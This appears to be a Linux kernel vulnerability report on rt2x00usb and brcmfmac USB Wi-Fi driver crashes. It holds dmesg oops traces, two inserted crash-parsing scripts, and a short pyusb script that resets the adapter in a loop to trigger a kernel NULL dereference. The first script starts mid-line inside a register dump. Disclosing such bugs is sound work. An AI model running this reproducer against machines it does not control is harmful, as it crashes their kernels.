[  +0.000002]  ? exit_to_user_mode_loop+0xe5/0x130
[  +0.000002]  ? srso_alias_return_thunk+0x5/0x7f
[  +0.000003]  ? exit_to_user_mode_prepare+0x30/0xb0
[  +0.000002]  ? srso_alias_return_thunk+0x5/0x7f
[  +0.000002]  ? syscall_exit_to_user_mode+0x37/0x60
[  +0.000002]  ? srso_alias_return_thunk+0x5/0x7f
[  +0.000003]  ? do_syscall_64+0x61/0x90
[  +0.000001]  ? do_syscall_64+0x61/0x90
[  +0.000003]  entry_SYSCALL_64_after_hwframe+0x73/0xdd
[  +0.000002] RIP: 0033:0x7bfb4872799d
[  +0.000005] Code: 28 89 54 24 1c 48 89 74 24 10 89 7c 24 08 e8 6a 90 f6 ff 8b 54 24 1c 48 8b 74 24 10 41 89 c0 8b 7c 24 08 b8 2e 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 33 44 89 c7 48 89 44 24 08 e8 ae 90 f6 ff 48
[  +0.000001] RSP: 002b:00007ffd73cd3280 EFLAGS: 00000293 ORIG_RAX: 000000000000002e
[  +0.000003] RAX: ffffffffffffffda RBX: 00000000000004a3 RCX: 00007bfb4872799d
[  +0.000001] RDX: 0000000000000000 RSI: 00007ffd73cd32c0 RDI: 000000000000000c
[  +0.000002] RBP: 000055d422a2e030 R08: 0000000000000000 R09: 0000000000000000
[  +0.000001] R10: 0000000000000000 R11: 0000000000000293 R12: 0000000000000000
[  +0.000001] R13: 00007ffd73cd3410 R14: 00007ffd73cd340c R15: 0000000000000000
[  +0.000004]  </TASK>
[  +0.000001] Modules linked in: rt2800usb rt2x00usb rt2800lib rt2x00lib tcp_diag inet_diag bnep nfnetlink_queue nfnetlink_log bluetooth ecdh_generic ecc usbmon nf_conntrack_netlink xfrm_user xfrm_algo xt_addrtype br_netfilter ccm xt_CHECKSUM xt_MASQUERADE xt_conntrack ipt_REJECT nf_reject_ipv4 xt_tcpudp nft_compat nft_chain_nat nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 nf_tables libcrc32c nfnetlink bridge stp llc overlay intel_rapl_msr intel_rapl_common snd_hda_codec_realtek snd_hda_codec_generic snd_hda_codec_hdmi snd_hda_intel snd_intel_dspcfg mt7921u mt76x2u snd_intel_sdw_acpi mt7921_common mt76x2_common edac_mce_amd amdgpu snd_hda_codec mt76_connac_lib mt76x02_usb mt76x02_lib mt76_usb snd_hda_core kvm_amd snd_hwdep mt76 binfmt_misc kvm snd_pcm irqbypass mac80211 crct10dif_pclmul snd_seq_midi amdxcp polyval_clmulni snd_seq_midi_event iommu_v2 polyval_generic drm_buddy ghash_clmulni_intel sha256_ssse3 snd_rawmidi gpu_sched sha1_ssse3 drm_suballoc_helper aesni_intel drm_ttm_helper nls_iso8859_1 ttm crypto_simd
[  +0.000056]  snd_seq cryptd cfg80211 drm_display_helper snd_seq_device snd_timer cec rapl rc_core joydev input_leds libarc4 drm_kms_helper eeepc_wmi snd wmi_bmof i2c_algo_bit k10temp soundcore ccp mac_hid sch_fq_codel msr parport_pc ppdev lp parport drm efi_pstore ip_tables x_tables autofs4 hid_logitech_hidpp hid_logitech_dj hid_generic usbhid hid mfd_aaeon asus_wmi video ledtrig_audio sparse_keymap platform_profile crc32_pclmul nvme ahci i2c_piix4 r8169 xhci_pci libahci nvme_core xhci_pci_renesas realtek nvme_common wmi
[  +0.000037] CR2: 00000000000011b0
[  +0.000002] ---[ end trace 0000000000000000 ]---
[  +0.164871] RIP: 0010:rt2x00usb_clear_entry+0x5/0x40 [rt2x00usb]
[  +0.000008] Code: d2 31 c9 31 f6 31 ff 45 31 c0 e9 e6 1a 90 e5 66 0f 1f 44 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 0f 1f 44 00 00 <48> 8b 47 10 48 c7 07 00 00 00 00 83 78 10 0e 74 0b 31 c0 31 f6 31
[  +0.000003] RSP: 0018:ffffb0fe4126f5e0 EFLAGS: 00010206
[  +0.000003] RAX: ffffffffc20411f0 RBX: 000000000000005f RCX: 0000000000000000
[  +0.000002] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 00000000000011a0
[  +0.000003] RBP: ffffb0fe4126f600 R08: 0000000000000000 R09: 0000000000000000
[  +0.000002] R10: 0000000000000000 R11: 0000000000000000 R12: ffff919567fab4f0
[  +0.000002] R13: ffff9198efd9e060 R14: ffff9198efd9c900 R15: ffff9196786a4000
[  +0.000002] FS:  00007bfb476a34c0(0000) GS:ffff91a42ee00000(0000) knlGS:0000000000000000
[  +0.000002] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  +0.000002] CR2: 00000000000011b0 CR3: 000000011e4ce000 CR4: 00000
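As an added triage aid (editor's example, not part of this report and not rt2x00 driver code): the script below splits dmesg text like the two logs above into crash events and, for each, extracts the bug kind, the faulting address or refcount_t message, the RIP symbol and the loadable module most likely at fault. The sample log is a constructed, abbreviated copy of the two logs above; the suspect_module() and user_reachable() heuristics are this example's own assumptions, not kernel conventions. It also handles a block that is cut off before "end trace", as the UAF log above is.

```python
# Added example: triage parser for the kernel Oops / refcount warnings above.
# Not from the report or the rt2x00 driver; SAMPLE_LOG is a constructed,
# abbreviated copy of the two logs, and the heuristics in suspect_module()
# and user_reachable() are this example's assumptions.
import re
from dataclasses import dataclass, field
from typing import List, Optional

SAMPLE_LOG = """\
[  371.258315] BUG: kernel NULL pointer dereference, address: 0000000000000038
[  371.258324] #PF: supervisor write access in kernel mode
[  371.258363] RIP: 0010:rt2x00usb_work_rxdone+0x5f/0xc0 [rt2x00usb]
[  371.258402] Call Trace:
[  371.258408]  ? show_regs+0x6d/0x80
[  371.258444]  ? rt2x00usb_work_rxdone+0x5f/0xc0 [rt2x00usb]
[  371.258463]  process_one_work+0x16c/0x350
[  371.258668] ---[ end trace 0000000000000000 ]---
[  371.785813] RIP: 0010:rt2x00usb_work_rxdone+0x5f/0xc0 [rt2x00usb]
[  +0.000002] refcount_t: addition on 0; use-after-free.
[  +0.000006] WARNING: CPU: 16 PID: 754 at lib/refcount.c:25 refcount_warn_saturate+0x12e/0x150
[  +0.000001] RIP: 0010:refcount_warn_saturate+0x12e/0x150
[  +0.000003]  ? refcount_warn_saturate+0x12e/0x150
[  +0.000003]  usb_get_urb+0x52/0x90
[  +0.000006]  rt2x00usb_kick_rx_entry+0xab/0xf0 [rt2x00usb]
[  +0.000006]  rt2x00usb_clear_entry+0x2c/0x40 [rt2x00usb]
[  +0.000004]  __x64_sys_sendmsg+0x1d/0x30
[  +0.000001] ---[ end trace 0000000000000000 ]---
"""

PREFIX_RE = re.compile(r"^\[\s*[+\d.]+\]\s?")  # dmesg timestamp, absolute or "+delta"
START_RES = [  # (kind, pattern whose group 1 is the detail)
    ("null-deref", re.compile(r"BUG: kernel NULL pointer dereference, address: ([0-9a-f]+)")),
    ("page-fault", re.compile(r"BUG: unable to handle page fault for address: ([0-9a-f]+)")),
    ("refcount-uaf", re.compile(r"refcount_t: (.+); use-after-free\.")),
]
PF_RE = re.compile(r"#PF: supervisor (read|write) access in kernel mode")
RIP_RE = re.compile(r"RIP: 0010:([\w.]+)\+0x[0-9a-f]+/0x[0-9a-f]+(?: \[(\w+)\])?")
FRAME_RE = re.compile(r"^(\? )?([\w.]+)\+0x[0-9a-f]+/0x[0-9a-f]+(?: \[(\w+)\])?$")
END_RE = re.compile(r"---\[ end trace")

@dataclass
class Frame:
    symbol: str
    module: Optional[str]   # None for built-in kernel code
    reliable: bool          # False for '?' frames (stale stack slots)

@dataclass
class KernelEvent:
    kind: str
    detail: str             # faulting address, or the refcount_t message
    access: Optional[str] = None
    rip_symbol: Optional[str] = None
    rip_module: Optional[str] = None
    frames: List[Frame] = field(default_factory=list)

    def suspect_module(self) -> Optional[str]:
        # Module holding RIP, else the first reliable frame inside a module
        # (the refcount warning fires in lib/refcount.c, not in the driver).
        if self.rip_module:
            return self.rip_module
        return next((f.module for f in self.frames if f.reliable and f.module), None)

    def user_reachable(self) -> bool:
        # A syscall frame means a user process, not a kworker, drove this path.
        return any(f.symbol.startswith(("__x64_sys_", "do_syscall_64")) for f in self.frames)

def parse_kernel_events(text: str) -> List[KernelEvent]:
    events: List[KernelEvent] = []
    cur: Optional[KernelEvent] = None
    for raw in text.splitlines():
        line = PREFIX_RE.sub("", raw).strip()
        for kind, rx in START_RES:
            m = rx.search(line)
            if m:
                if cur is not None:          # previous block never reached 'end trace'
                    events.append(cur)
                cur = KernelEvent(kind=kind, detail=m.group(1))
                break
        else:
            if cur is None:                  # outside any block (e.g. the repeated RIP dump)
                continue
            if END_RE.search(line):
                events.append(cur)
                cur = None
            elif (m := PF_RE.search(line)):
                cur.access = m.group(1)
            elif (m := RIP_RE.search(line)):
                cur.rip_symbol, cur.rip_module = m.group(1), m.group(2)
            elif (m := FRAME_RE.match(line)):
                cur.frames.append(Frame(m.group(2), m.group(3), m.group(1) is None))
    if cur is not None:                      # log cut off mid-oops, as the UAF log above
        events.append(cur)
    return events

if __name__ == "__main__":
    for ev in parse_kernel_events(SAMPLE_LOG):
        ctx = "user-driven" if ev.user_reachable() else "async (kworker)"
        print(f"{ev.kind} {ev.detail} at {ev.rip_symbol}: suspect {ev.suspect_module()}, {ctx}")
```

Run against the full logs above it reports the NULL dereference as an asynchronous kworker fault with RIP inside rt2x00usb, and the refcount warning as a NetworkManager-driven netlink path whose RIP is in lib/refcount.c but whose first reliable in-module frame is rt2x00usb_kick_rx_entry, which is the distinction a maintainer needs when deciding where to look first.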



There is another point that we do not quite understand. We also triggered this vulnerability on a Broadcom network card. However, the kernel message indicated that the issue was due to the brcmfmac firmware. Using lsusb, we discovered that this chip also uses the rt2x00 chipset. Could you please clarify whether you can address this issue as well, or should we notify Broadcom?

----------------------------- Broadcom crash log

[ +0.709539] usb 3-1.4: reset high-speed USB device number 8 using xhci_hcd
[ +0.133374] brcmfmac: brcmf_c_process_clm_blob: no clm_blob available (err=-2), device may have limited channels available
[ +0.000007] brcmfmac: brcmf_c_process_txcap_blob: no txcap_blob available (err=-2)
[ +0.000742] brcmfmac: brcmf_c_preinit_dcmds: Firmware: BCM43236/3 wl0: Nov 30 2011 17:33:42 version 5.90.188.22
[ +0.056253] usb 3-1.4 wlxbc307eab1237: renamed from wlan0
[ +0.024459] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, bsscfgidx=0
[ +0.000006] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed (69)
[ +0.003143] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, bsscfgidx=0
[ +0.000003] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed (69)
[ +0.000003] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, bsscfgidx=0
[ +0.000001] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed (69)
[ +0.003414] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, bsscfgidx=0
[ +0.000004] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed (69)
[ +0.013322] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, bsscfgidx=0
[ +0.000003] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed (69)
[ +0.000047] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, bsscfgidx=0
[ +0.000002] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed (69)
[ +0.001726] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, bsscfgidx=0
[ +0.000003] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed (69)
[ +0.000053] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, bsscfgidx=0
[ +0.000002] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed (69)
[ +0.005724] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, bsscfgidx=0
[ +0.000004] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed (69)
[ +0.082551] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, bsscfgidx=0
[ +0.000007] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed (69)
[ +0.002798] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, bsscfgidx=0
[ +0.000004] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed (69)
[ +0.009268] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, bsscfgidx=0
[ +0.000005] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed (69)
[ +0.037693] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, bsscfgidx=0
[ +0.000007] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed (69)
[ +0.004651] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, bsscfgidx=0
[ +0.000004] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed (69)
[ +0.740682] usb 3-1.4: reset high-speed USB device number 8 using xhci_hcd
[ +0.135285] brcmfmac: brcmf_c_process_clm_blob: no clm_blob available (err=-2), device may have limited channels available
[ +0.000007] brcmfmac: brcmf_c_process_txcap_blob: no txcap_blob available (err=-2)
[ +0.000741] brcmfmac: brcmf_c_preinit_dcmds: Firmware: BCM43236/3 wl0: Nov 30 2011 17:33:42 version 5.90.188.22
[ +0.015434] BUG: kernel NULL pointer dereference, address: 0000000000000360
[ +0.000004] #PF: supervisor read access in kernel mode
[ +0.000002] #PF: error_code(0x0000) - not-present page
[ +0.000003] PGD 0 P4D 0
[ +0.000006] Oops: 0000 [#1] PREEMPT SMP NOPTI
[ +0.000005] CPU: 0 PID: 19093 Comm: kworker/0:4 Tainted: G OE 6.5.0-41-generic #41~22.04.2-Ubuntu
[ +0.000005] Hardware name: System manufacturer System Product Name/TUF GAMING X570-PLUS, BIOS 3603 03/20/2021
[ +0.000003] Workqueue: events brcmf_fweh_event_worker [brcmfmac]
[ +0.000024] RIP: 0010:brcmf_cfg80211_escan_handler+0x27/0x380 [brcmfmac]
[ +0.000017] Code: 90 90 90 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 53 48 83 ec 20 4c 8b 17 44 8b 6e 08 4d 8b 72 20 41 83 fd 04 74 67 <49> 8b 86 60 03 00 00 48 89 fb a8 01 0f 84 b9 02 00 00 41 83 fd 08
[ +0.000003] RSP: 0018:ffffb44e061fbd20 EFLAGS: 00010202
[ +0.000003] RAX: 0000000000000000 RBX: ffff94582e9759c0 RCX: ffffb44e061fbde8
[ +0.000003] RDX: ffff9456d574f450 RSI: ffffb44e061fbde8 RDI: ffff94582e9759c0
[ +0.000002] RBP: ffffb44e061fbd68 R08: ffff9456d574f450 R09: 0000000000000000
[ +0.000003] R10: ffff9458bce3c900 R11: 0000000000000000 R12: 0000000000000045
[ +0.000002] R13: 0000000000000008 R14: 0000000000000000 R15: 0000000000000045
[ +0.000003] FS: 0000000000000000(0000) GS:ffff9465aea00000(0000) knlGS:0000000000000000
[ +0.000003] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ +0.000002] CR2: 0000000000000360 CR3: 0000000210812000 CR4: 0000000000750ef0
[ +0.000003] PKRU: 55555554
[ +0.000002] Call Trace:
[ +0.000003] <TASK>
[ +0.000004] ? show_regs+0x6d/0x80
[ +0.000007] ? __die+0x24/0x80
[ +0.000005] ? page_fault_oops+0x99/0x1b0
[ +0.000006] ? do_user_addr_fault+0x31d/0x6b0
[ +0.000005] ? exc_page_fault+0x83/0x1b0
[ +0.000006] ? asm_exc_page_fault+0x27/0x30
[ +0.000008] ? brcmf_cfg80211_escan_handler+0x27/0x380 [brcmfmac]
[ +0.000016] ? srso_alias_return_thunk+0x5/0x7f
[ +0.000005] ? psi_group_change+0x230/0x570
[ +0.000006] ? __pfx_brcmf_cfg80211_escan_handler+0x10/0x10 [brcmfmac]
[ +0.000016] brcmf_fweh_call_event_handler+0x5c/0x110 [brcmfmac]
[ +0.000018] brcmf_fweh_event_worker+0x89/0x320 [brcmfmac]
[ +0.000016] ? raw_spin_rq_unlock+0x10/0x40
[ +0.000004] ? srso_alias_return_thunk+0x5/0x7f
[ +0.000004] ? finish_task_switch.isra.0+0x85/0x2a0
[ +0.000006] process_one_work+0x240/0x450
[ +0.000006] worker_thread+0x50/0x3f0
[ +0.000004] ? srso_alias_return_thunk+0x5/0x7f
[ +0.000005] ? __pfx_worker_thread+0x10/0x10
[ +0.000004] kthread+0xf2/0x120
[ +0.000005] ? __pfx_kthread+0x10/0x10
[ +0.000004] ret_from_fork+0x47/0x70
[ +0.000005] ? __pfx_kthread+0x10/0x10
[ +0.000005] ret_from_fork_asm+0x1b/0x30
[ +0.000007] </TASK>
[ +0.000003] Modules linked in: brcmfmac_wcc brcmfmac brcmutil nf_conntrack_netlink xfrm_user xfrm_algo xt_addrtype br_netfilter xt_CHECKSUM xt_MASQUERADE xt_conntrack ipt_REJECT nf_reject_ipv4 xt_tcpudp nft_compat nft_chain_nat nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 vboxnetadp(OE) vboxnetflt(OE) vboxdrv(OE) nf_tables libcrc32c nfnetlink bridge stp llc overlay intel_rapl_msr intel_rapl_common snd_hda_codec_realtek rt2800usb snd_hda_codec_generic snd_hda_codec_hdmi rt2x00usb edac_mce_amd rt2800lib snd_hda_intel snd_intel_dspcfg rt2x00lib snd_intel_sdw_acpi kvm_amd snd_hda_codec amdgpu mac80211 snd_hda_core snd_hwdep kvm binfmt_misc snd_pcm irqbypass amdxcp crct10dif_pclmul snd_seq_midi iommu_v2 cfg80211 nls_iso8859_1 polyval_clmulni snd_seq_midi_event drm_buddy polyval_generic ghash_clmulni_intel libarc4 input_leds joydev gpu_sched sha256_ssse3 snd_rawmidi sha1_ssse3 drm_suballoc_helper drm_ttm_helper aesni_intel ttm crypto_simd snd_seq cryptd drm_display_helper snd_seq_device rapl snd_timer cec rc_core snd
[ +0.000101] eeepc_wmi wmi_bmof drm_kms_helper k10temp i2c_algo_bit soundcore ccp mac_hid sch_fq_codel msr parport_pc ppdev lp parport drm efi_pstore ip_tables x_tables autofs4 hid_logitech_hidpp hid_logitech_dj hid_generic usbhid hid mfd_aaeon asus_wmi video ledtrig_audio sparse_keymap platform_profile crc32_pclmul nvme ahci i2c_piix4 r8169 xhci_pci nvme_core libahci xhci_pci_renesas realtek nvme_common wmi
[ +0.000053] CR2: 0000000000000360
[ +0.000003] ---[ end trace 0000000000000000 ]---
[ +0.289680] RIP: 0010:brcmf_cfg80211_escan_handler+0x27/0x380 [brcmfmac]
[ +0.000044] Code: 90 90 90 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 53 48 83 ec 20 4c 8b 17 44 8b 6e 08 4d 8b 72 20 41 83 fd 04 74 67 <49> 8b 86 60 03 00 00 48 89 fb a8 01 0f 84 b9 02 00 00 41 83 fd 08
[ +0.000005] RSP: 0018:ffffb44e061fbd20 EFLAGS: 00010202
[ +0.000005] RAX: 0000000000000000 RBX: ffff94582e9759c0 RCX: ffffb44e061fbde8
[ +0.000004] RDX: ffff9456d574f450 RSI: ffffb44e061fbde8 RDI: ffff94582e9759c0
[ +0.000003] RBP: ffffb44e061fbd68 R08: ffff9456d574f450 R09: 0000000000000000
[ +0.000003] R10: ffff9458bce3c900 R11: 0000000000000000 R12: 0000000000000045
[ +0.000003] R13: 0000000000000008 R14: 0000000000000000 R15: 0000000000000045
[ +0.000003] FS: 0000000000000000(0000) GS:ffff9465aea00000(0000) knlGS:0000000000000000
[ +0.000004] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ +0.000004] CR2: 0000000000000360 CR3: 0000000210812000 CR4: 0000000000750ef0
[ +0.000003] PKRU: 55555554
[ +0.000003] note: kworker/0:4[19093] exited with irqs disabled
[ +0.036443] usb 3-1.4 wlxbc307eab1237: renamed from wlan0
[ +0.726413] ieee80211 phy34: brcmf_fil_cmd_data: bus is down. we have nothing to do.
[ +0.000010] ieee80211 phy34: brcmf_notify_escan_complete: Scan abort failed
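
The oops above carries most of what a maintainer needs to triage the report, but it is easy to misread by hand: which of the frames are trustworthy, which register held the NULL base, and whether the fault is a NULL-plus-offset or a dangling pointer. The following parser is an added example, not code from the report or from the kernel tree. It pulls the fault address, access type, taint flags, workqueue, faulting symbol, registers and the unwinder's reliable frames out of a dmesg oops (both the absolute `[  371.258315]` and the relative `[ +0.000003]` timestamp styles), then derives a crash signature and a coarse classification. The sample input is a trimmed copy of the brcmfmac oops quoted above; the `PAGE_SIZE` threshold and the `0xffff8000...` kernel-space boundary are assumptions for x86-64.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample input: a trimmed copy of the brcmfmac oops quoted above.
SAMPLE_OOPS = """\
[ +0.015434] BUG: kernel NULL pointer dereference, address: 0000000000000360
[ +0.000004] #PF: supervisor read access in kernel mode
[ +0.000005] CPU: 0 PID: 19093 Comm: kworker/0:4 Tainted: G OE 6.5.0-41-generic #41~22.04.2-Ubuntu
[ +0.000003] Workqueue: events brcmf_fweh_event_worker [brcmfmac]
[ +0.000024] RIP: 0010:brcmf_cfg80211_escan_handler+0x27/0x380 [brcmfmac]
[ +0.000003] RAX: 0000000000000000 RBX: ffff94582e9759c0 RCX: ffffb44e061fbde8
[ +0.000002] R13: 0000000000000008 R14: 0000000000000000 R15: 0000000000000045
[ +0.000002] Call Trace:
[ +0.000003] <TASK>
[ +0.000004] ? show_regs+0x6d/0x80
[ +0.000008] ? brcmf_cfg80211_escan_handler+0x27/0x380 [brcmfmac]
[ +0.000016] brcmf_fweh_call_event_handler+0x5c/0x110 [brcmfmac]
[ +0.000018] brcmf_fweh_event_worker+0x89/0x320 [brcmfmac]
[ +0.000006] process_one_work+0x240/0x450
[ +0.000007] </TASK>
"""

PAGE_SIZE = 4096  # assumed x86-64 page size: a fault below it is NULL + struct field offset
TS_RE = re.compile(r"^\[\s*\+?[\d.]+\]\s*")  # dmesg timestamp prefix, absolute or relative
BUG_RE = re.compile(r"BUG: kernel NULL pointer dereference, address: ([0-9a-f]+)")
PF_RE = re.compile(r"#PF: (?:supervisor|user) (read|write|instruction fetch) access")
CPU_RE = re.compile(r"CPU: \d+ PID: \d+ Comm: (\S+) (Not tainted|Tainted: [A-Z ]+?)\s+(\d+\.\d+\.\S+)")
WQ_RE = re.compile(r"Workqueue: \S+ (\S+)")
FRAME_RE = re.compile(r"^(\? )?(\S+?)\+0x([0-9a-f]+)/0x[0-9a-f]+(?: \[(\w+)\])?$")
REG_RE = re.compile(r"\b(R[A-Z0-9]{1,2}): ([0-9a-f]{16})\b")  # RAX..R15 only, not CRn/CS/FS

@dataclass
class OopsSummary:
    fault_addr: Optional[int] = None
    access: Optional[str] = None
    comm: Optional[str] = None
    tainted: Optional[str] = None  # taint flags, None when "Not tainted"
    kernel: Optional[str] = None
    workqueue: Optional[str] = None
    rip_symbol: Optional[str] = None
    rip_offset: Optional[int] = None
    rip_module: Optional[str] = None
    regs: Dict[str, int] = field(default_factory=dict)
    frames: List[Tuple[str, Optional[str], bool]] = field(default_factory=list)  # (symbol, module, reliable)

def parse_oops(text: str) -> OopsSummary:
    s = OopsSummary()
    in_trace = False
    for raw in text.splitlines():
        line = TS_RE.sub("", raw).strip()
        if in_trace:
            if line == "</TASK>":
                in_trace = False
            elif (m := FRAME_RE.match(line)):
                # a leading "? " means the unwinder found the address on the stack but
                # cannot prove it is a live return address; treat such frames as unreliable
                s.frames.append((m.group(2), m.group(4), m.group(1) is None))
            continue
        if line == "<TASK>":
            in_trace = True
        elif (m := BUG_RE.search(line)):
            s.fault_addr = int(m.group(1), 16)
        elif (m := PF_RE.search(line)):
            s.access = m.group(1)
        elif (m := CPU_RE.search(line)):
            s.comm, s.kernel = m.group(1), m.group(3)
            s.tainted = None if m.group(2) == "Not tainted" else m.group(2)[len("Tainted: "):]
        elif (m := WQ_RE.search(line)):
            s.workqueue = m.group(1)
        elif line.startswith("RIP: "):
            m = FRAME_RE.match(line.split(":", 2)[2].strip())  # drop "RIP: 0010:"
            if m:
                s.rip_symbol, s.rip_offset, s.rip_module = m.group(2), int(m.group(3), 16), m.group(4)
        else:
            for name, val in REG_RE.findall(line):
                s.regs[name] = int(val, 16)
    return s

def classify(s: OopsSummary) -> str:
    """Coarse triage of the faulting address."""
    if s.fault_addr is None:
        return "no page-fault address found"
    if s.fault_addr < PAGE_SIZE:
        return f"NULL base pointer, field offset 0x{s.fault_addr:x}"
    if s.fault_addr >= 0xFFFF800000000000:  # assumed x86-64 kernel-space boundary
        return "kernel-space address: dangling or corrupted pointer, reproduce under KASAN"
    return "user-space address dereferenced in kernel mode"

def null_base_candidates(s: OopsSummary) -> List[str]:
    """Registers holding zero: the NULL base must have been loaded into one of these."""
    return sorted(name for name, val in s.regs.items() if val == 0)

def reliable_driver_frames(s: OopsSummary) -> List[str]:
    """Trusted frames that live in a module: the call path into the driver."""
    return [f"{sym} [{mod}]" for sym, mod, reliable in s.frames if reliable and mod]

def signature(s: OopsSummary) -> str:
    """Stable key for de-duplicating reports that hit the same crash site."""
    return f"{s.rip_module}:{s.rip_symbol}+0x{s.rip_offset:x}:{s.access}:0x{s.fault_addr:x}"

if __name__ == "__main__":
    summary = parse_oops(SAMPLE_OOPS)
    print(signature(summary), "|", classify(summary))
    print("zero regs:", null_base_candidates(summary), "| driver path:", reliable_driver_frames(summary))
```

Run against the full log above, the signature comes out as `brcmfmac:brcmf_cfg80211_escan_handler+0x27:read:0x360` and the zero registers include R14. That agrees with the `Code:` line: the bytes after `<`, `49 8b 86 60 03 00 00`, decode to `mov rax,[r14+0x360]`, so CR2 is exactly the field offset added to a NULL R14. The `?`-marked frames (including the `brcmf_cfg80211_escan_handler` entry inside the trace) are leftovers on the stack, while the unmarked `brcmf_fweh_call_event_handler` and `brcmf_fweh_event_worker` frames give the real path from the workqueue into the driver. The taint flags (`G OE` here, from the out-of-tree VirtualBox modules in the module list) are worth recording too, since maintainers will ask about them.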



import usb.core
import time

# Replace the VID and PID with the IDs of your USB adapter (check with lsusb).
dev = usb.core.find(idVendor=0x148f, idProduct=0x3572)
if dev is None:
    raise ValueError("Device not found")


def send_ctrl_transfer(bmRequestType, bRequest, wValue, wIndex, data_length):
    try:
        data = bytes([0xFF] * data_length)
        print(
            f"Sending: bmRequestType={bmRequestType}, bRequest={bRequest}, wValue={wValue}, wIndex={wIndex}, data={data}")
        dev.ctrl_transfer(bmRequestType, bRequest, wValue, wIndex, data)
    except Exception as e:
        print(f"Error: {e}")


requests = [
    (0x00, 0x00, 0x0000, 0x0000, 1),
]

for i in range(100):
    for bmRequestType, bRequest, wValue, wIndex, data_length in requests:
        send_ctrl_transfer(bmRequestType, bRequest, wValue, wIndex, data_length)
        time.sleep(0.1)  # raise to 0.2 if the issue does not reproduce on your system
        dev.reset()

